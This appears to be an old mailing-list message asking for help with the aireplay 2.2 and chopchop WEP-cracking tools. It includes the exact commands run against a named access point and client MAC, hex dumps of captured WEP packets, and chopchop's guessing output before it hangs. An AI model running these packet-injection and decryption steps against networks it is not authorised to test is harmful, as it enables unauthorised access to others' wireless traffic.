I'm having a little problem with the ARP request forgery technique in your
readme. I know it's not directly related to aireplay 2.2, but I thought my
problem might be of help for future version features/ideas, and if not, I'm
sorry and I understand.
Here is my output; sorry, but it's a bit long.
The packets came from going to a web site on a client machine.
D-Link=00:0D:88:8D:18:2F
WinXP=00:04:E2:D8:7B:AF
root@tekn0:~/root/aireplay-2.2# ./aireplay -i wlan0 -b 00:0D:88:8D:18:2F
Seen 23 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf c039 720b 0000 4748 2efd ....{..9r...GH..
0x0020: 764c 584c 7458 74fd 2415 8431 19be 090c vLXLtXt.$..1....
0x0030: 13ef 6747 deeb 94f1 39d8 0264 0b63 492e ..gG....9..d.cI.
0x0040: fc5d 4cc4 .]L.
Replay this packet ? n
Seen 24 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2:D8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf d039 730b 0000 f139 86f9 ....{..9s....9..
0x0020: 8ea9 2e1b 7858 88a6 325d d0c0 afd6 72cc ....xX..2]....r.
0x0030: f21e a8ca 20ea 8f07 b883 bcbd d47a ec1f .... ........z..
0x0040: 424f af5d BO.]
Replay this packet ? n
Seen 25 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:0D:88:8D:18:2F
Dst. MAC = 00:04:E2:D8:7B:AF
0x0000: 0842 7500 0004 e2d8 7baf 000d 888d 182f .Bu.....{....../
0x0010: 000d 888d 182f e039 912b 0000 a319 731f ...../.9.+....s.
0x0020: bf78 0abc 34cf 559e a2ac 1b39 0175 211f .x..4.U....9.u!.
0x0030: ce35 2f44 1d77 db46 71eb 3bb7 093b 5502 .5/D.w.Fq.;..;U.
0x0040: a63d cc5e 6080 91c0 .=.^`...
Replay this packet ? y
Saving replayed packet in replay-20050201_2144.cap
root@tekn0:~/root/aireplay-2.2# ./chopchop-0.1/chopchop -b 00:0D:88:8D:18:2F -m 00:04:E2:D8:7B:AF -p replay-20050201_2144.cap
00:0D:88:8D:18:2F 6
0
00:04:E2:D8:7B:AF 6
first pass
-----------------
packet number 001
base src mac: 00 04 e2 d8 7b af
base dst mac: ff 0a 2d 13 49 38
guess 0x7a / number of frame written 130
guess 0x67 / number of frame written 104
guess 0xcb / number of frame written 208
guess 0xbe / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 9
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 5
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0xaf / number of frame written 182
guess 0x7b / number of frame written 130
guess 0xd8 / number of frame written 221
guess 0xe2 / number of frame written 234
guess 0x04 / number of frame written 13
guess 0x00 / number of frame written 8
guess 0x01 / number of frame written 7
guess 0x00 / number of frame written 4
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x2f / number of frame written 52
guess 0x18 / number of frame written 39
guess 0x8d / number of frame written 143
guess 0x88 / number of frame written 143
guess 0x0d / number of frame written 273
guess 0x00 / number of frame written 12
guess 0x02 / number of frame written 13
guess 0x00 / number of frame written 13
guess 0x04 / number of frame written 13
guess 0x06 / number of frame written 13
Then it just hangs and does nothing.
Am I not waiting long enough? Waited 5 minutes.
I have tried a few different packets, although I'm not sure what types they
were nor the sizes, but they all hang in the same manner; they spit out a
bunch of "frame written 13" at the end.
I followed the instructions in the readme, although I'm not sure exactly
what packet to pick. I tried to use ones that had source and dest fields
filled in and not use any packets with ff:ff:ff:ff:ff:ff for the dst MAC.
Also, does aireplay 2.2 have any way to display the packet
size when it's asking you if you want to use the packet, and would you know
of the best packets to use? I know ARPs/TCP ACK/and DHCP are supposed to
work well, but I'm not sure of the best way to tell the size of the packet.
Thanks again for such a great tool and all your time and help.